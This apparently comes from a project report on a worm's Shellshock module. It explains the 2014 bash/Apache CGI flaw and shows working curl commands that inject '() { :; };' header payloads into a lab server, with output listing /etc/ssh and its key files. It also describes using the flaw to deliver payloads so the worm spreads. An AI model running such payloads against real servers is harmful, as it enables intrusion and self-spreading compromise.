Illustration of "Worm: Shellshock exploit"

Description and background

Shellshock is a security bug that has been found in september 2014 in bash in combination with other programs like Apache HTTPD[@20141].

When a client send a request to the server, it can specifies headers, which are a list of keys associated with values. HTTPD is a server, which receive TCP connection, and handle the clients connection a nd request. It can also forward those request to other programs (a shell, PHP, or any other sof tware) also called “module” to handle the logical part of the process.

The problem which appeared with HTTPD and bash was because of the way HTTPD use d to forward the HTTP headers to the process that module. Each header was using an environment variable (the key was the name of the variable, and the value was associated to it).

But bash executes the content of those environment variables. As the client must be untrusted, the content of the headers should have been sanitized bef ore wrote to bash. The bug has been widely patched today, and if a server is still vulnerable t o this attack, then is is most likely to belongs to a botnet already.

curl http://192.168.0.125/cgi-bin/test-cgi -H   "User-Agent: () { :; }; echo
\"ShellShockHeader
: Vulnerable\"" -I

HTTP/1.1 200 OK

Date: Thu, 08 Jun 2017 17:06:02 GMTServer: Apache/2.4.1 (Unix)

ShellShockHeader: Vulnerable

Content-Type: text/plain; charset=iso-8859-1

It is possible with this bug to execute an arbitrary shell code with possibly root permission. It is possible to list critical files, overwrite them, restart services, etc.

curl http://192.168.0.125/cgi-bin/test-cgi -H "Attack: () { :; }; echo; /usr/bin/env ls
/etc/ss
h -l"

total 280

-rw-r–r– 1 root root 242091 Jul 22 2016 moduli

-rw-r–r– 1 root root 1690 Jul 22 2016 ssh_config

-rw——- 1 root root 672 Apr 29 10:56 sshhostdsa_key

-rw-r–r– 1 root root 601 Apr 29 10:56 sshhostdsa_key.pub

The shellshock features for a worm

The Shellshock module uses this bug to make the target execute an arbitrary shell code. Is is possible to specify any domain name or that will be scanned. If an is tested positive to this bug, an arbitrary payload can be delivered to this server, allowing the worm to propagate on it for example.